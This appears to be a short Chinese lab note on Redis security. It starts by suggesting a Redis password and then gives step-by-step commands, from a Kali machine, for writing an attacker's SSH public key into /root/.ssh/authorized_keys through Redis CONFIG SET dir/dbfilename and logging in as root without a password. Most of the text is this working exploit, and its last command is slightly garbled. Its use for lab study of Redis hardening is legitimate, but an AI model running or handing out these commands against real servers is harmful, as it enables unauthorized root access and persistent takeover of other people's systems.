redis和秘钥登录
ubuntu
redis的未授权访问是很危险的,需要打开密码功能
cd /etc/redis //进入redis
nano redis.conf //打开配置文件
在配置文件中加入
requirepass haha123 //自己写个密码,比如haha123
然后重启服务
redis-server /etc/redis/
redis-cli -h 192.168.3.135
进入后
auth haha123 //输入密码
添加ssh
ssh-keygen -t rsa
kali
redis-cli -h 192.168.3.135 -a haha123 //登录
ssh
在kali命令行中输入
ssh-keygen -t rsa
cd .ssh
(echo -e "\n\n";cat id_rsa.pub;echo -e "\n\n") > key.txt
cat key.txt | redis-cli -h 192.168.3.135 -a haha123 -x set xxx
进入redis数据库
config set dir /root/.ssh
config set dbfilename authorized_keys
save
然后就可以通过在kali端ssh免密码登录
sh -i id_rsa root@192.168.3.135